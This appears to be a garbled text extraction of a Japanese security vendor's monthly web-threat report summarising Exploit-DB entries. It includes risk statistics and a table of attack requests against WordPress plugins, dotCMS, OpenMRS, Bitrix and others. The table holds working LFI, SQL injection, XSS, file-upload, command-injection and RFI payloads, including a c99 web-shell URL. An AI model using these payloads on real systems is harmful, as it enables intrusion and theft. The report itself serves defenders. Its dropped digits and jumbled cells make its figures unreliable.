EDB-Report 最新 Web トレンドレポート (05.) 05..0~05.. Exploit-DB( より公開されている内容に基づいたトレンド情報ですペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチームサマリー 05

Size: px

Start display at page:

Download "EDB-Report 最新 Web トレンドレポート (05.) 05..0~05.. Exploit-DB( より公開されている内容に基づいたトレンド情報ですペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチームサマリー 05"

さなえすわ
5 years ago
Views:

1 05.

2 EDB-Report 最新 Web トレンドレポート (05.) 05..0~05.. Exploit-DB( より公開されている内容に基づいたトレンド情報ですペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチームサマリー 05 年月に公開されたExploit-DBの分析結果 Local File Inclusion 攻撃に対する報告件数が最も多かったです分析されたLocal File Inclusion 攻撃は含めているファイルの内容を開けてみる簡単なから特定命令を実行させるまで攻撃難易度の側面では多様でしたが危険度面では全て高いでしたまた特定のアプリケーションと関連しパラメータの値ではなくパラメータキーを狙うLocal File Inclusion 攻撃も発見され今回が発見されたソフトウェアを使用する管理者は該当関連セキュリティパッチを実施したり "../" と同じ文字列をフィルターしたりエラーページ公開を禁じるなどの対応を実施して特定ファイルが露出されたり実行にならないように注意しなければなりません主要ソフトウェア別発生の現況を見ると世界的に代表的なCMS Wordpressが最も多いが報告されました使用者が多く Pluginも多様に提供されるWordpressはハッカーの主な攻撃対象となるためが発見されたPluginを使用する管理者は常に最新のアップデートを維持しなければなりません. 別件数カテゴリ件数 Command Injection 別件数 File Upload Code Injection RFI 5 SQL インジェクション (SQL Injection) クロスサイトスクリプティング (Cross Site Scripting : XSS) LFI 合計 Command File Upload Injection Code Injection 5 RFI 6 SQL インジェククロスサイトスションクリプティング (SQL (Cross Site Injection) Scripting : XSS) LFI 危険度別分類. 危険度別件数危険度件数割合早急対応要 0 7% 高 7 7% 合計 7 00% 7 0 早急対応要高攻撃実行の難易度別件数. 攻撃実行の難易度別件数難易度件数割合難 5% 中 8% 易 86% 合計 7 00% 難中易主なソフトウェア別発生件数 4. 主なソフトウェア別発生件数ソフトウェア名 dotcms Bigware OpenMRS ECommerceMajor PHP Utility Belt Zen Cart Zenphoto ArticleSetup SIMOGEO FileManager PFSense iy0 Dizin Scripti Beezfud bitrix.xscan Bitrix module bitrix.mpbuilder Bitrix module 合計件数 dotcms Bigware OpenMRS ECommerceMajor PHP Utility Belt Zen Cart Zenphoto ArticleSetup SIMOGEO FileManager PFSense iy0 Dizin Scripti Beezfud bitrix.xscan Bitrix module Copyright 05 Penta Security Systems Inc. All rights reserved

3 EDB-Report 最新 Web トレンドレポート (05.) 05..0~05.. Exploit-DB( より公開されている内容に基づいたトレンド情報です危険度分類基準早急対応要 : 攻撃が成功した場合システムへ侵入可高 : システム情報を取得するかあるいはクライアントに次被害を及ぼす中 : 情報漏洩攻撃実行難易度分類基準難 : 複数のを突いた攻撃パターン対象のシステムの重要な情報を取得するため高度な攻撃コードを採用したパターン知らされていない攻撃コードを採用したパターンのいずれかに該当する中 : 攻撃手法自体は難しくないが迂回コードを採用したパターン易 : 回のリクエストで攻撃が成立するパターン複数回トライするも既知の攻撃コードを採用したパターンのいずれかに該当する ** 5 件以上発生した主なソフトウェア別の詳細情報 EDB 番号カテゴリ攻撃難易度危険度名ソフトウェア名 886 RFI 易高 Gwolle Guestbook Plugin.5. - ajaxresponse.php RFI 8856 XSS 易高 Users Ultra Plugin admin-ajax.php XSS 8855 SQL Injection 易高 Users Ultra Plugin admin-aja= x.php SQL Injection 8869 LFI 易早急対応要 Plugin TheCartPress v Miranda.class.php LFI 8869 Command Injection 中早急対応要 Plugin TheCartPress v Command injection 8868 LFI 易早急対応要 Plugin Sell Download v sell-downloads.php Command injection 8867 File Upload 易高 Plugin Advanced uploader v.0 - upload.php File Upload 8867 LFI 易早急対応要 Plugin Advanced uploader v.0 - upload.php LFI 890 SQL Injection 難早急対応要 Polls Widget Plugin admin-ajax.php SQL Injection 895 XSS 易高 Plugin WP Easy Poll.. - admin.php XSS 8966 XSS 易高 Admin Management Xtended Plugin admin-ajax.php XSS 9 SQL Injection 難早急対応要 Simple Ads Manager sam-ajax-loader.php SQL Injection Copyright 05 Penta Security Systems Inc. All rights reserved

4 日付 EDB 番号カテゴリ攻撃難易度危険度名攻撃コード対象プログラム対象環境 LFI 易高 RFI 易高 XSS 易高 EDB-Report 最新 Web トレンドレポート (05.) 05..0~05.. Exploit-DB( より公開されている内容に基づいたトレンド情報です Zenphoto plugindoc.php LFI Gwolle Guestbook Plugin.5. - ajaxresponse.php RFI Users Ultra Plugin admin-ajax.php XSS /zenphoto-zenphoto-.4.0/zpcore/plugindoc.php?thirdparty=&extension=../../../x ampp/phpinfo /wp-content/plugins/gwollegb/frontend/captcha/ajaxresponse.php?abspath= POST /wp-admin/admin-ajax.php HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/ Safari/55.7 Zenphoto Zenphoto.4.0 Gwolle Guestbook Plugin.5. Users Ultra Plugin SQL Injection 易高 Users Ultra Plugin admin-aja= x.php SQL Injection action=package_add_new&p_name=a<script>alert()</scr ipt> POST /wp-admin/admin-ajax.php HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/ Safari/55.7 Users Ultra Plugin LFI 易早急対応要 Command Injection 中早急対応要 LFI 易早急対応要 File Upload 易高 Plugin TheCartPress v Miranda.class.php LFI Plugin TheCartPress v Command injection Plugin Sell Download v selldownloads.php Command injection Plugin Advanced uploader v.0 - upload.php File Upload action=edit_video&video_id= and sleep(5) /wpcontent/plugins/thecartpress/modules/miranda.class.p hp?page=../../../../../../../../wp-config.php%00 /wp/adminajax.php?action=tcp_miranda_save_admin_panel&class=l s -al /wp-content/plugins/sell-downloads/selldownloads.php?file=../../../../../../../../.././wpconfig.php%00 POST /wp-content/plugins/advanceduploader/upload.php HTTP/. Connection: Close Accept: text/html, application/xhtml+xml, */* Accept-Language: ko-kr User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows NT 6.; WOW64; Trident/6.0) Content-Type: multipart/form-data; boundary= dd009908f Plugin TheCartPress v.4.7 Plugin TheCartPress v.4.7 Plugin Sell Download v.0.6 Plugin Advanced uploader v dd009908f Content-Disposition: form-data; name="file"; filename="@kd.php" Content-Type: application/octet-stream <? phpinfo();?> dd009908f LFI 易早急対応要 Plugin Advanced uploader v.0 - upload.php LFI /wp-content/plugins/advanceduploader/upload.php?destinations=../../../../../../../../../wp-config.php%00 Plugin Advanced uploader v XSS 易상 XSS 易早急対応要 XSS 易早急対応要 dotcms..4 - TagAjax.addTag.dwr XSS dotcms..4 - CategoryAjax.saveOrUpdateCate gory.dwr XSS dotcms..4 - /c/portal/layout XSS POST /dwr/call/plaincall/tagajax.addtag.dwr HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/ Safari/55.7 c0-param0=<script>alert()<%fscript> POST /dwr/call/plaincall/categoryajax.saveorupdatecategor y.dwr HTTP/. POST /c/portal/layout?p_l_id=a8e40e cf- ade- 5978e64a8&p_p_id=EXT_LUCENE_TOOL&p_p_action=0& HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/ Safari/55.7 offset="><script>alert()<%fscript> dotcms dotcms..4 dotcms dotcms..4 dotcms dotcms..4 Copyright 05 Penta Security Systems Inc. All rights reserved

5 EDB-Report 最新 Web トレンドレポート (05.) 05..0~05.. Exploit-DB( より公開されている内容に基づいたトレンド情報です日付 EDB 番号カテゴリ攻撃難易度危険度名攻撃コード対象プログラム対象環境 SQL Injection 難早急対応要 Code injection 中高 LFI 易高 XSS 易高 Polls Widget Plugin admin-ajax.php SQL Injection PHP Utility Belt - ajax.php Code injection OpenMRS. - viewportlet.htm LFI OpenMRS. - cohortreport.form XSS POST /wp-admin/adminajax.php?action=pollinsertvalues HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/ Safari/55.7 question_id=7 union select group_concat(0x7e,(select(@)from(select(@:=0x00),(se lect(@)from(information_schema.tables)where table_schema=database() and (@)in(@:=concat(@,0xc67e,table_name))))a)),-- - &poll_answer_securety=4ac4f87e&date_answers[0]=5 POST /php-utility-belt/ajax.php HTTP/. Polls Widget Plugin.0.7 PHP Utility Belt PHP Utility Belt User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 /openmrs/module/reporting/viewportlet.htm?id=reportd esignportlet&url=..%f..%f..%fweb- OpenMRS OpenMRS. POST /openmrs/admin/reports/cohortreport.form HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/ Safari/55.7 OpenMRS OpenMRS LFI 中早急対応要 XSS 易高 SIMOGEO FileManager..0 - filemanager.php LFI Plugin WP Easy Poll.. - admin.php XSS parentuuid=7ddec8-60be-47-9dd-7 9cdc44&name="><script>alert(</scr ipt>&description="><script>alert(</scr ipt> /Filemanager/connectors/php/filemanager.php?mode=pre view&path=//...//...//...//...//...//...//... //...//...//etc/passwd POST /wordpress/wpadmin/admin.php?page=easy_polls&action=add HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/ Safari/55.7 SIMOGEO FileManager SIMOGEO FileManager..0 Plugin WP Easy Poll SQL Injection 易高 iy0 Dizin Scripti - /admin SQL Injection p_ques=<script>alert(document.cookie)</script> POST /admin HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/ Safari/55.7 iy0 Dizin Scripti iy0 Dizin Scripti LFI 易高 LFI 易高 Bitrix bitrix.xscan Module.0. - bitrix.xscan_worker.php LFI Bitrix bitrix.mpbuilder Module bitrix.mpbuilder_step.php LFI id='or' =&pw='or' = /admin/bitrix.xscan_worker.php?action=prison&file=/u pload/main/77f/image.jpg../../../../../bitrix/.setti ngs.php POST /bitrix/admin/bitrix.mpbuilder_step.php?module_id=b log HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/ Safari/55.7 bitrix.xscan Bitrix module bitrix.mpbuilder Bitrix module bitrix.xscan Bitrix module.0. bitrix.mpbuilder Bitrix module.0.0 save=&work[/../../../../../../../../../../../../../../../../../../tmp/file]= XSS 易高 Admin Management Xtended Plugin adminajax.php XSS POST /wp-admin/admin-ajax.php?action=ame_save_title HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/ Safari/55.7 Admin Management Xtended Plugin SQL Injection 易高 RFI 易高 LFI 易高 XSS 易高 XSS 易高 ECommerceMajor - productdtl.php SQL Injection bulletindoc Module.9 - admin.php RFI File Hosting.5 - download.php LFI File Hosting.5 - files.php XSS File Hosting.5 - file.php XSS category_id=&new_title=<script>alert(document.cooki e);</script> /ecommercemajor/productdtl.php?prodid=%0and%0=- - /bulletindoc-- 9/programs/admin.php?babInstallPath= r.com/index.php /tequila/download.php?filename=files/../../../../../ etc/passwd&name=passwd /files.php?folder="><script>alert('ehsan')</script> /file.php?file="><script>alert('ehsan')</script> ECommerceMajor ECommerceMajor bulletindoc Module.9 File Hosting.5 File Hosting.5 File Hosting.5 Copyright 05 Penta Security Systems Inc. All rights reserved

6 EDB-Report 最新 Web トレンドレポート (05.) 05..0~05.. Exploit-DB( より公開されている内容に基づいたトレンド情報です日付 EDB 番号カテゴリ攻撃難易度危険度名攻撃コード対象プログラム対象環境 RFI 易高 SQL Injection 易高 LFI 易高 LFI 易高 RFI 易高 RFI 易高 LFI 易高 LFI 易高 Code Injection 易高 SQL Injection 難早急対応要 absences Module.64 - planning.php RFI ArticleSetup Article Script.00 - article.php SQL Injection /absences-- 64/programs/planning.php?GLOBALS[babInstallPath]=htt p:// /article.php?id=%0and%0=-- ArticleSetup absences Module.64 ArticleSetup Article Script.00 Zen Cart ajax.php LFI /ajax.php?method=&act=/../../../../tmp/file Zen Cart Zen Cart.5.4 PFSense <=..5 - wizard.php LFI /wizard.php?xml=../../../.xml PFSense PFSense <=..5 /maillist-4- maillist Module 4.0 0/programs/mlincl.php?GLOBALS[babInstallPath]= maillist Module - mlincl.php RFI /yourshellpath.com/c99.txt 4.0 /online-- 8/programs/admin.php?GLOBALS[babAddonPhpPath]= online Module.8 - admin.php RFI / Bigware Shop..0 - main_bigware_.php LFI Bigware Shop..0 - main_bigware_5.php LFI Beezfud - index.php Code Injection Simple Ads Manager sam-ajax-loader.php SQL Injection /Bigware_Shop/modules/basic_pricing/configmain/main_ bigware_.php?language=/../../../../index.php /Bigware_Shop/modules/basic_pricing/configmain/main_ bigware_5.php?language=/../../../../index.php /beezfud/index.php?lookback=;echo%0%7<?php%0phpin fo();%0?>%7%0>info.php; POST /wp-content/plugins/simple-ads-manager/samajax-loader.php HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/ Safari/55.7 action=load_place&id=0&pid=&wc=yto0ontzoji6ilddijtz OjM6IjE9MCI7czozOiJXQQiOM6MDoiIjtzOjM6IldDVyI7czox MTg6IikgVU5JT04gKFNFTEVDVCBcVyXBhcMsIDEsIDIsIDMs IDQsIDUsIDYsIDcsIDgsIDksIDAsIDEsIDIsIDMsIDQsIDUsIDYs IDcsIDgsIDksIDAsIDEsIDIgRlJPTSBcF9cVycyBXSEVSRSBJ RCA9IDEiOM6NDoiV0MyVyI7czowOiIiO0= Bigware Bigware Beezfud online Module.8 Bigware Shop..0 Bigware Shop..0 Beezfud Simple Ads Manager Copyright 05 Penta Security Systems Inc. All rights reserved

最新 Web トレンドレポート (06.04) ~ Exploit-DB(http://exploit-db.com) より公開されている内容に基づいたトレンド情報ですサマリーペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 06 年 4

最新 Web トレンドレポート (06.04) ~ Exploit-DB(http://exploit-db.com) より公開されている内容に基づいたトレンド情報ですサマリーペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 06 年 4 06.04 最新 Web トレンドレポート (06.04) 06.04.0~06.04.0 Exploit-DB(http://exploit-db.com) より公開されている内容に基づいたトレンド情報ですサマリーペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 06 年 4 月公開された Exploit-DB の分析結果クロスサイトスクリプティング (Cross

EDB-Report 最新 Web トレンドレポート (05.) 05..0~05.. Exploit-DB( より公開されている内容に基づいたトレンド情報です ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム サマリー 05

EDB-Report 最新 Web トレンドレポート (05.) 05..0~05.. Exploit-DB( より公開されている内容に基づいたトレンド情報ですペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチームサマリー 05